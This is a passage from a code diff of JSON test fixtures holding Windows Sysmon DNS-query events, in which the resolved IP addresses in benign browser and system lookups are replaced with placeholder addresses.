cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7809,7 +7809,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;", + "QueryResults": "type: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:16.386", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7829,7 +7829,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -7859,7 +7859,7 @@ "ProcessId": "2736", "QueryName": "syndication.twitter.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;" + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;" } }, "log": { @@ -7880,7 +7880,7 @@ "ProcessId": "2736", "QueryName": "ade.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:19.578" }, @@ -7899,7 +7899,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7912,7 +7912,7 @@ "@timestamp": "2021-05-05T15:30:51.712Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -7934,7 +7934,7 @@ "ProcessId": "356", "QueryName": "iecvlist.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;", + "QueryResults": "type: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "provider_name": "Microsoft-Windows-Sysmon", @@ -7962,7 +7962,7 @@ "ProcessId": "844", "QueryName": "tsfe.trafficshaping.dsp.mp.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;", + "QueryResults": "type: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe" }, "process": { @@ -7986,7 +7986,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -8121,7 +8121,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -8149,7 +8149,7 @@ "ProcessId": "1788", "QueryName": "v10.vortex-win.data.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;", + "QueryResults": "type: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -8174,7 +8174,7 @@ "provider_name": "Microsoft-Windows-Sysmon", "opcode": "Info", "event_data": { - "QueryResults": "type: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;", + "QueryResults": "type: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe", "UtcTime": "2019-07-18 03:43:04.400", "ProcessGuid": "{fa4a0de6-b1a3-5d2f-0000-00102f440100}", @@ -8193,7 +8193,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -8533,7 +8533,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData 